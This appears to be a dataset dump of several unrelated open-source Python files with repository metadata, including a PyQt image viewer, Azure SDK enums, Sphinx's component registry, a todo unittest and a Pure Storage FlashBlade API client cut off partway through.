print sumIntervals([[1,4], [7, 10], [3, 5]])
print sumIntervals([[1,5], [10, 20], [1, 6], [16, 19], [5, 11]])
|
[
"antonismatis@gmail.com"
] |
antonismatis@gmail.com
|
447d86e8e9209462fd50b2b94da10ea4ce9f191d
|
582cf2295d4b4666421da511507858435912ea30
|
/Sample.py
|
0a4cf81985e2de9af19913e6e31e192aa913f273
|
[] |
no_license
|
limjisooooooo/z
|
bfe71ba18fe186e02be5e7908d3068d86e9f63db
|
cf0dc6f3de63decd69ecd7f139740334807054bc
|
refs/heads/master
| 2020-04-27T04:13:53.611372
| 2019-03-28T08:46:28
| 2019-03-28T08:46:28
| 174,047,811
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 838
|
py
|
import sys
import base64
from PyQt5.QtWidgets import *
#from PyQt5.QtGui import *
class Form(QMainWindow):
def __init__(self):
super().__init__()
self.browser = QTextBrowser(self)
self.browser.setGeometry(0, 0, 471, 401)
self.setGeometry(0, 0, 500, 500)
self.btnFile = QPushButton(self)
self.btnFile.setGeometry(2, 430, 25, 25)
self.btnFile.clicked.connect(self.fopen)
self.show()
self.setWindowTitle('Sample')
def fopen(self):
FileName, Filter = QFileDialog.getOpenFileUrl()
if FileName.path() != "":
f = open(FileName.path()[1:], 'rb')
data = base64.b64encode(f.read())
#print(data)
self.browser.append("<img src='data:image/jpeg;base64, " + data.decode() + "' alt='Image Can't Load'/>")
f.close()
if __name__ == '__main__':
app = QApplication(sys.argv)
w = Form()
sys.exit(app.exec())
|
[
"trefrasd@gmail.com"
] |
trefrasd@gmail.com
|
25b980a0be5f061c6bdc488b9c6e51969e8a81c7
|
ceb5b7c3882b2bf3f53219356e914462c680f059
|
/azure-mgmt-compute/azure/mgmt/compute/containerservice/v2017_01_31/models/container_service_client_enums.py
|
279f5dcb9d3ff37bd26b6e9a9c88b555f28c3dff
|
[
"MIT"
] |
permissive
|
codalab/azure-sdk-for-python
|
b712da2a377cfa526e0ffa4fa40408e6a81e48e3
|
f4c92d02d46fcdee9da430a18a394b108a2f8920
|
refs/heads/master
| 2021-01-19T14:40:23.567035
| 2017-04-11T22:49:13
| 2017-04-11T22:49:13
| 88,180,409
| 1
| 0
| null | 2017-04-13T15:36:45
| 2017-04-13T15:36:44
| null |
UTF-8
|
Python
| false
| false
| 2,291
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from enum import Enum
class ContainerServiceOchestratorTypes(Enum):
swarm = "Swarm"
dcos = "DCOS"
custom = "Custom"
kubernetes = "Kubernetes"
class ContainerServiceVMSizeTypes(Enum):
standard_a0 = "Standard_A0"
standard_a1 = "Standard_A1"
standard_a2 = "Standard_A2"
standard_a3 = "Standard_A3"
standard_a4 = "Standard_A4"
standard_a5 = "Standard_A5"
standard_a6 = "Standard_A6"
standard_a7 = "Standard_A7"
standard_a8 = "Standard_A8"
standard_a9 = "Standard_A9"
standard_a10 = "Standard_A10"
standard_a11 = "Standard_A11"
standard_d1 = "Standard_D1"
standard_d2 = "Standard_D2"
standard_d3 = "Standard_D3"
standard_d4 = "Standard_D4"
standard_d11 = "Standard_D11"
standard_d12 = "Standard_D12"
standard_d13 = "Standard_D13"
standard_d14 = "Standard_D14"
standard_d1_v2 = "Standard_D1_v2"
standard_d2_v2 = "Standard_D2_v2"
standard_d3_v2 = "Standard_D3_v2"
standard_d4_v2 = "Standard_D4_v2"
standard_d5_v2 = "Standard_D5_v2"
standard_d11_v2 = "Standard_D11_v2"
standard_d12_v2 = "Standard_D12_v2"
standard_d13_v2 = "Standard_D13_v2"
standard_d14_v2 = "Standard_D14_v2"
standard_g1 = "Standard_G1"
standard_g2 = "Standard_G2"
standard_g3 = "Standard_G3"
standard_g4 = "Standard_G4"
standard_g5 = "Standard_G5"
standard_ds1 = "Standard_DS1"
standard_ds2 = "Standard_DS2"
standard_ds3 = "Standard_DS3"
standard_ds4 = "Standard_DS4"
standard_ds11 = "Standard_DS11"
standard_ds12 = "Standard_DS12"
standard_ds13 = "Standard_DS13"
standard_ds14 = "Standard_DS14"
standard_gs1 = "Standard_GS1"
standard_gs2 = "Standard_GS2"
standard_gs3 = "Standard_GS3"
standard_gs4 = "Standard_GS4"
standard_gs5 = "Standard_GS5"
|
[
"lmazuel@microsoft.com"
] |
lmazuel@microsoft.com
|
825006c894ca28563ceb49ebb22caa4eb6aead20
|
4e0c1615c467c63524db9a33d0e769f1370f5a12
|
/python-ops/training/exercise/test/murthy/r30.py
|
ae1cc0288d7548781efef0cae97dc498836eb388
|
[] |
no_license
|
infra-ops/cloud-ops
|
1afb44ed29000491aaa5420ebc6e0b8d740fc55c
|
4f676fde13f33c838f7f17affd705966a6d31da2
|
refs/heads/master
| 2023-08-27T03:00:32.867645
| 2023-08-23T14:27:59
| 2023-08-23T14:27:59
| 140,283,053
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 64
|
py
|
values = [100,200,300,400]
slice = values[1:3]
print(slice)
|
[
"chakraborty.rock@gmail.com"
] |
chakraborty.rock@gmail.com
|
14c97cc76c6333d459e2b615402d70304853e1d8
|
520a9b3d11f4a4ce93d0927a8fd5c575252b3559
|
/lib/python2.7/site-packages/sphinx/registry.py
|
cdae7722411e7bcd78f8a786996f665d8862a229
|
[
"Apache-2.0"
] |
permissive
|
Larsende/F5_Agility_2018_Security_in_AWS
|
90c7404962313b13cec63321e6fc38bdc9516dd0
|
1bebcf9d441a3e3b7348757fcbc83844fbb0132e
|
refs/heads/master
| 2020-03-20T02:23:59.099742
| 2018-08-12T15:28:50
| 2018-08-12T15:28:50
| 137,111,587
| 0
| 2
|
Apache-2.0
| 2018-08-03T21:19:48
| 2018-06-12T18:21:58
|
Python
|
UTF-8
|
Python
| false
| false
| 15,315
|
py
|
# -*- coding: utf-8 -*-
"""
sphinx.registry
~~~~~~~~~~~~~~~
Sphinx component registry.
:copyright: Copyright 2007-2016 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from __future__ import print_function
import traceback
from pkg_resources import iter_entry_points
from six import iteritems, itervalues, string_types
from sphinx.domains import ObjType
from sphinx.domains.std import GenericObject, Target
from sphinx.errors import ExtensionError, SphinxError, VersionRequirementError
from sphinx.extension import Extension
from sphinx.locale import __
from sphinx.parsers import Parser as SphinxParser
from sphinx.roles import XRefRole
from sphinx.util import import_object
from sphinx.util import logging
from sphinx.util.console import bold # type: ignore
from sphinx.util.docutils import directive_helper
if False:
# For type annotation
from typing import Any, Callable, Dict, Iterator, List, Type, Union # NOQA
from docutils import nodes # NOQA
from docutils.io import Input # NOQA
from docutils.parsers import Parser # NOQA
from docutils.transforms import Transform # NOQA
from sphinx.application import Sphinx # NOQA
from sphinx.builders import Builder # NOQA
from sphinx.domains import Domain, Index # NOQA
from sphinx.environment import BuildEnvironment # NOQA
from sphinx.ext.autodoc import Documenter # NOQA
from sphinx.util.typing import RoleFunction # NOQA
logger = logging.getLogger(__name__)
# list of deprecated extensions. Keys are extension name.
# Values are Sphinx version that merge the extension.
EXTENSION_BLACKLIST = {
"sphinxjp.themecore": "1.2"
} # type: Dict[unicode, unicode]
class SphinxComponentRegistry(object):
def __init__(self):
self.autodoc_attrgettrs = {} # type: Dict[Type, Callable[[Any, unicode, Any], Any]]
self.builders = {} # type: Dict[unicode, Type[Builder]]
self.documenters = {} # type: Dict[unicode, Type[Documenter]]
self.domains = {} # type: Dict[unicode, Type[Domain]]
self.domain_directives = {} # type: Dict[unicode, Dict[unicode, Any]]
self.domain_indices = {} # type: Dict[unicode, List[Type[Index]]]
self.domain_object_types = {} # type: Dict[unicode, Dict[unicode, ObjType]]
self.domain_roles = {} # type: Dict[unicode, Dict[unicode, Union[RoleFunction, XRefRole]]] # NOQA
self.post_transforms = [] # type: List[Type[Transform]]
self.source_parsers = {} # type: Dict[unicode, Parser]
self.source_inputs = {} # type: Dict[unicode, Input]
self.translators = {} # type: Dict[unicode, nodes.NodeVisitor]
self.transforms = [] # type: List[Type[Transform]]
def add_builder(self, builder):
# type: (Type[Builder]) -> None
logger.debug('[app] adding builder: %r', builder)
if not hasattr(builder, 'name'):
raise ExtensionError(__('Builder class %s has no "name" attribute') % builder)
if builder.name in self.builders:
raise ExtensionError(__('Builder %r already exists (in module %s)') %
(builder.name, self.builders[builder.name].__module__))
self.builders[builder.name] = builder
def preload_builder(self, app, name):
# type: (Sphinx, unicode) -> None
if name is None:
return
if name not in self.builders:
entry_points = iter_entry_points('sphinx.builders', name)
try:
entry_point = next(entry_points)
except StopIteration:
raise SphinxError(__('Builder name %s not registered or available'
' through entry point') % name)
self.load_extension(app, entry_point.module_name)
def create_builder(self, app, name):
# type: (Sphinx, unicode) -> Builder
if name not in self.builders:
raise SphinxError(__('Builder name %s not registered') % name)
return self.builders[name](app)
def add_domain(self, domain):
# type: (Type[Domain]) -> None
logger.debug('[app] adding domain: %r', domain)
if domain.name in self.domains:
raise ExtensionError(__('domain %s already registered') % domain.name)
self.domains[domain.name] = domain
def has_domain(self, domain):
# type: (unicode) -> bool
return domain in self.domains
def create_domains(self, env):
# type: (BuildEnvironment) -> Iterator[Domain]
for DomainClass in itervalues(self.domains):
domain = DomainClass(env)
# transplant components added by extensions
domain.directives.update(self.domain_directives.get(domain.name, {}))
domain.roles.update(self.domain_roles.get(domain.name, {}))
domain.indices.extend(self.domain_indices.get(domain.name, []))
for name, objtype in iteritems(self.domain_object_types.get(domain.name, {})):
domain.add_object_type(name, objtype)
yield domain
def override_domain(self, domain):
# type: (Type[Domain]) -> None
logger.debug('[app] overriding domain: %r', domain)
if domain.name not in self.domains:
raise ExtensionError(__('domain %s not yet registered') % domain.name)
if not issubclass(domain, self.domains[domain.name]):
raise ExtensionError(__('new domain not a subclass of registered %s '
'domain') % domain.name)
self.domains[domain.name] = domain
def add_directive_to_domain(self, domain, name, obj,
has_content=None, argument_spec=None, **option_spec):
# type: (unicode, unicode, Any, bool, Any, Any) -> None
logger.debug('[app] adding directive to domain: %r',
(domain, name, obj, has_content, argument_spec, option_spec))
if domain not in self.domains:
raise ExtensionError(__('domain %s not yet registered') % domain)
directives = self.domain_directives.setdefault(domain, {})
directives[name] = directive_helper(obj, has_content, argument_spec, **option_spec)
def add_role_to_domain(self, domain, name, role):
# type: (unicode, unicode, Union[RoleFunction, XRefRole]) -> None
logger.debug('[app] adding role to domain: %r', (domain, name, role))
if domain not in self.domains:
raise ExtensionError(__('domain %s not yet registered') % domain)
roles = self.domain_roles.setdefault(domain, {})
roles[name] = role
def add_index_to_domain(self, domain, index):
# type: (unicode, Type[Index]) -> None
logger.debug('[app] adding index to domain: %r', (domain, index))
if domain not in self.domains:
raise ExtensionError(__('domain %s not yet registered') % domain)
indices = self.domain_indices.setdefault(domain, [])
indices.append(index)
def add_object_type(self, directivename, rolename, indextemplate='',
parse_node=None, ref_nodeclass=None, objname='',
doc_field_types=[]):
# type: (unicode, unicode, unicode, Callable, nodes.Node, unicode, List) -> None
logger.debug('[app] adding object type: %r',
(directivename, rolename, indextemplate, parse_node,
ref_nodeclass, objname, doc_field_types))
# create a subclass of GenericObject as the new directive
directive = type(directivename, # type: ignore
(GenericObject, object),
{'indextemplate': indextemplate,
'parse_node': staticmethod(parse_node),
'doc_field_types': doc_field_types})
self.add_directive_to_domain('std', directivename, directive)
self.add_role_to_domain('std', rolename, XRefRole(innernodeclass=ref_nodeclass))
object_types = self.domain_object_types.setdefault('std', {})
object_types[directivename] = ObjType(objname or directivename, rolename)
def add_crossref_type(self, directivename, rolename, indextemplate='',
ref_nodeclass=None, objname=''):
# type: (unicode, unicode, unicode, nodes.Node, unicode) -> None
logger.debug('[app] adding crossref type: %r',
(directivename, rolename, indextemplate, ref_nodeclass, objname))
# create a subclass of Target as the new directive
directive = type(directivename, # type: ignore
(Target, object),
{'indextemplate': indextemplate})
self.add_directive_to_domain('std', directivename, directive)
self.add_role_to_domain('std', rolename, XRefRole(innernodeclass=ref_nodeclass))
object_types = self.domain_object_types.setdefault('std', {})
object_types[directivename] = ObjType(objname or directivename, rolename)
def add_source_parser(self, suffix, parser):
# type: (unicode, Type[Parser]) -> None
logger.debug('[app] adding search source_parser: %r, %r', suffix, parser)
if suffix in self.source_parsers:
raise ExtensionError(__('source_parser for %r is already registered') % suffix)
self.source_parsers[suffix] = parser
def get_source_parser(self, filename):
# type: (unicode) -> Type[Parser]
for suffix, parser_class in iteritems(self.source_parsers):
if filename.endswith(suffix):
break
else:
# use special parser for unknown file-extension '*' (if exists)
parser_class = self.source_parsers.get('*')
if parser_class is None:
raise SphinxError(__('source_parser for %s not registered') % filename)
else:
if isinstance(parser_class, string_types):
parser_class = import_object(parser_class, 'source parser') # type: ignore
return parser_class
def get_source_parsers(self):
# type: () -> Dict[unicode, Parser]
return self.source_parsers
def create_source_parser(self, app, filename):
# type: (Sphinx, unicode) -> Parser
parser_class = self.get_source_parser(filename)
parser = parser_class()
if isinstance(parser, SphinxParser):
parser.set_application(app)
return parser
def add_source_input(self, input_class):
# type: (Type[Input]) -> None
for filetype in input_class.supported:
if filetype in self.source_inputs:
raise ExtensionError(__('source_input for %r is already registered') %
filetype)
self.source_inputs[filetype] = input_class
def get_source_input(self, filename):
# type: (unicode) -> Type[Input]
parser = self.get_source_parser(filename)
for filetype in parser.supported:
if filetype in self.source_inputs:
input_class = self.source_inputs[filetype]
break
else:
# use special source_input for unknown file-type '*' (if exists)
input_class = self.source_inputs.get('*')
if input_class is None:
raise SphinxError(__('source_input for %s not registered') % filename)
else:
return input_class
def add_translator(self, name, translator):
# type: (unicode, Type[nodes.NodeVisitor]) -> None
logger.info(bold(__('Change of translator for the %s builder.') % name))
self.translators[name] = translator
def get_translator_class(self, builder):
# type: (Builder) -> Type[nodes.NodeVisitor]
return self.translators.get(builder.name,
builder.default_translator_class)
def create_translator(self, builder, document):
# type: (Builder, nodes.Node) -> nodes.NodeVisitor
translator_class = self.get_translator_class(builder)
return translator_class(builder, document)
def add_transform(self, transform):
# type: (Type[Transform]) -> None
logger.debug('[app] adding transform: %r', transform)
self.transforms.append(transform)
def get_transforms(self):
# type: () -> List[Type[Transform]]
return self.transforms
def add_post_transform(self, transform):
# type: (Type[Transform]) -> None
logger.debug('[app] adding post transform: %r', transform)
self.post_transforms.append(transform)
def get_post_transforms(self):
# type: () -> List[Type[Transform]]
return self.post_transforms
def add_documenter(self, objtype, documenter):
# type: (unicode, Type[Documenter]) -> None
self.documenters[objtype] = documenter
def add_autodoc_attrgetter(self, typ, attrgetter):
# type: (Type, Callable[[Any, unicode, Any], Any]) -> None
self.autodoc_attrgettrs[typ] = attrgetter
def load_extension(self, app, extname):
# type: (Sphinx, unicode) -> None
"""Load a Sphinx extension."""
if extname in app.extensions: # alread loaded
return
if extname in EXTENSION_BLACKLIST:
logger.warning(__('the extension %r was already merged with Sphinx since '
'version %s; this extension is ignored.'),
extname, EXTENSION_BLACKLIST[extname])
return
# update loading context
app._setting_up_extension.append(extname)
try:
mod = __import__(extname, None, None, ['setup'])
except ImportError as err:
logger.verbose(__('Original exception:\n') + traceback.format_exc())
raise ExtensionError(__('Could not import extension %s') % extname, err)
if not hasattr(mod, 'setup'):
logger.warning(__('extension %r has no setup() function; is it really '
'a Sphinx extension module?'), extname)
metadata = {} # type: Dict[unicode, Any]
else:
try:
metadata = mod.setup(app)
except VersionRequirementError as err:
# add the extension name to the version required
raise VersionRequirementError(
__('The %s extension used by this project needs at least '
'Sphinx v%s; it therefore cannot be built with this '
'version.') % (extname, err)
)
if metadata is None:
metadata = {}
if extname == 'rst2pdf.pdfbuilder':
metadata['parallel_read_safe'] = True
elif not isinstance(metadata, dict):
logger.warning(__('extension %r returned an unsupported object from '
'its setup() function; it should return None or a '
'metadata dictionary'), extname)
metadata = {}
app.extensions[extname] = Extension(extname, mod, **metadata)
app._setting_up_extension.pop()
|
[
"davidelarsen@live.com"
] |
davidelarsen@live.com
|
3f37df8301b6e1dbb044c648cb837c0f03ffdbc6
|
a1582cec6239f627c6740b391d751f429675ee39
|
/test_todo.py
|
039a3c22c18438751c553f7c5c877b02e940182e
|
[] |
no_license
|
SolbiatiAlessandro/todos
|
7cabfd35d6c7d3cdd3232051be4a96c667d55f21
|
b85e74c4fc220dccc5a0a05a288465b2da98f6d0
|
refs/heads/master
| 2020-03-28T18:56:09.847298
| 2018-10-15T15:07:01
| 2018-10-15T15:07:01
| 148,928,531
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 638
|
py
|
import unittest
import todo
from os import path
dir_path = path.dirname(path.realpath(__file__))
class testTODO( unittest.TestCase ):
def test_readElems( self ):
self.assertIsNotNone( todo.readElems() )
def test_todoDone( self ):
with open(dir_path+'/todos','a') as f:
f.write('"[test elem]" 0')
#import pdb;pdb.set_trace()
elems = todo.readElems()
self.assertEqual( "[test elem]", elems[0][1] )
todo.todoDone()
elems = todo.readElems()
self.assertNotEqual( "[test elem]", elems[0][1] )
if __name__ == '__main__':
unittest.main()
|
[
"alexsolbiati@hotmail.it"
] |
alexsolbiati@hotmail.it
|
19ebe0e0280c2829c58678866cdc0eb3a1da7611
|
bbe6f37f7347cb83f08846d505ac4aa6bc0031e6
|
/purity_fb/purity_fb_1dot9/apis/arrays_api.py
|
7bd8335e17e2cf1d85d4d5361d2a51ff900af97e
|
[
"Apache-2.0"
] |
permissive
|
bsamz-ps/purity_fb_python_client
|
02ff7213075cf1948e2db7b0835cc5fcc56f328a
|
11f27ef0c72d8aac1fc4e1ed036cca038b85dfa4
|
refs/heads/master
| 2021-02-19T08:11:04.042758
| 2020-02-12T23:56:08
| 2020-02-12T23:56:08
| 245,294,511
| 0
| 0
|
NOASSERTION
| 2020-03-06T00:14:27
| 2020-03-06T00:14:26
| null |
UTF-8
|
Python
| false
| false
| 43,419
|
py
|
# coding: utf-8
"""
Pure Storage FlashBlade REST 1.9 Python SDK
Pure Storage FlashBlade REST 1.9 Python SDK. Compatible with REST API versions 1.0 - 1.9. Developed by [Pure Storage, Inc](http://www.purestorage.com/). Documentations can be found at [purity-fb.readthedocs.io](http://purity-fb.readthedocs.io/).
OpenAPI spec version: 1.9
Contact: info@purestorage.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class ArraysApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def list_arrays(self, **kwargs):
"""
List arrays
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: ArrayResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_arrays_with_http_info(**kwargs)
else:
(data) = self.list_arrays_with_http_info(**kwargs)
return data
def list_arrays_with_http_info(self, **kwargs):
"""
List arrays
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: ArrayResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_arrays" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.9/arrays', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArrayResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_arrays_http_specific_performance(self, **kwargs):
"""
List instant or historical http specific performance
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_http_specific_performance(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int start_time: Time to start sample in milliseconds since epoch.
:param int end_time: Time to end sample in milliseconds since epoch.
:param int resolution: sample frequency in milliseconds
:return: ArrayHttpPerformanceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_arrays_http_specific_performance_with_http_info(**kwargs)
else:
(data) = self.list_arrays_http_specific_performance_with_http_info(**kwargs)
return data
def list_arrays_http_specific_performance_with_http_info(self, **kwargs):
"""
List instant or historical http specific performance
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_http_specific_performance_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int start_time: Time to start sample in milliseconds since epoch.
:param int end_time: Time to end sample in milliseconds since epoch.
:param int resolution: sample frequency in milliseconds
:return: ArrayHttpPerformanceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['start_time', 'end_time', 'resolution']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_arrays_http_specific_performance" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'start_time' in params:
query_params.append(('start_time', params['start_time']))
if 'end_time' in params:
query_params.append(('end_time', params['end_time']))
if 'resolution' in params:
query_params.append(('resolution', params['resolution']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.9/arrays/http-specific-performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArrayHttpPerformanceResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_arrays_nfs_specific_performance(self, **kwargs):
"""
List instant or historical nfs specific performance
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_nfs_specific_performance(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int start_time: Time to start sample in milliseconds since epoch.
:param int end_time: Time to end sample in milliseconds since epoch.
:param int resolution: sample frequency in milliseconds
:return: ArrayNfsPerformanceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_arrays_nfs_specific_performance_with_http_info(**kwargs)
else:
(data) = self.list_arrays_nfs_specific_performance_with_http_info(**kwargs)
return data
def list_arrays_nfs_specific_performance_with_http_info(self, **kwargs):
"""
List instant or historical nfs specific performance
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_nfs_specific_performance_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int start_time: Time to start sample in milliseconds since epoch.
:param int end_time: Time to end sample in milliseconds since epoch.
:param int resolution: sample frequency in milliseconds
:return: ArrayNfsPerformanceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['start_time', 'end_time', 'resolution']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_arrays_nfs_specific_performance" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'start_time' in params:
query_params.append(('start_time', params['start_time']))
if 'end_time' in params:
query_params.append(('end_time', params['end_time']))
if 'resolution' in params:
query_params.append(('resolution', params['resolution']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.9/arrays/nfs-specific-performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArrayNfsPerformanceResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_arrays_performance(self, **kwargs):
"""
List instant or historical array performance
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_performance(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int start_time: Time to start sample in milliseconds since epoch.
:param int end_time: Time to end sample in milliseconds since epoch.
:param int resolution: sample frequency in milliseconds
:param str protocol: to sample performance of a certain protocol
:return: ArrayPerformanceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_arrays_performance_with_http_info(**kwargs)
else:
(data) = self.list_arrays_performance_with_http_info(**kwargs)
return data
def list_arrays_performance_with_http_info(self, **kwargs):
"""
List instant or historical array performance
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_performance_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int start_time: Time to start sample in milliseconds since epoch.
:param int end_time: Time to end sample in milliseconds since epoch.
:param int resolution: sample frequency in milliseconds
:param str protocol: to sample performance of a certain protocol
:return: ArrayPerformanceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['start_time', 'end_time', 'resolution', 'protocol']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_arrays_performance" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'start_time' in params:
query_params.append(('start_time', params['start_time']))
if 'end_time' in params:
query_params.append(('end_time', params['end_time']))
if 'resolution' in params:
query_params.append(('resolution', params['resolution']))
if 'protocol' in params:
query_params.append(('protocol', params['protocol']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.9/arrays/performance', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ArrayPerformanceResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_arrays_performance_replication(self, **kwargs):
"""
List instant or historical array replication performance.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_performance_replication(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int end_time: Time to end sample in milliseconds since epoch.
:param int resolution: sample frequency in milliseconds
:param int start_time: Time to start sample in milliseconds since epoch.
:param str type: to sample space of either file systems, object store, or all
:return: ArrayPerformanceReplicationResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_arrays_performance_replication_with_http_info(**kwargs)
else:
(data) = self.list_arrays_performance_replication_with_http_info(**kwargs)
return data
def list_arrays_performance_replication_with_http_info(self, **kwargs):
"""
List instant or historical array replication performance.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_performance_replication_with_http_info(callback=callback_function)
:param callback function: The callback function
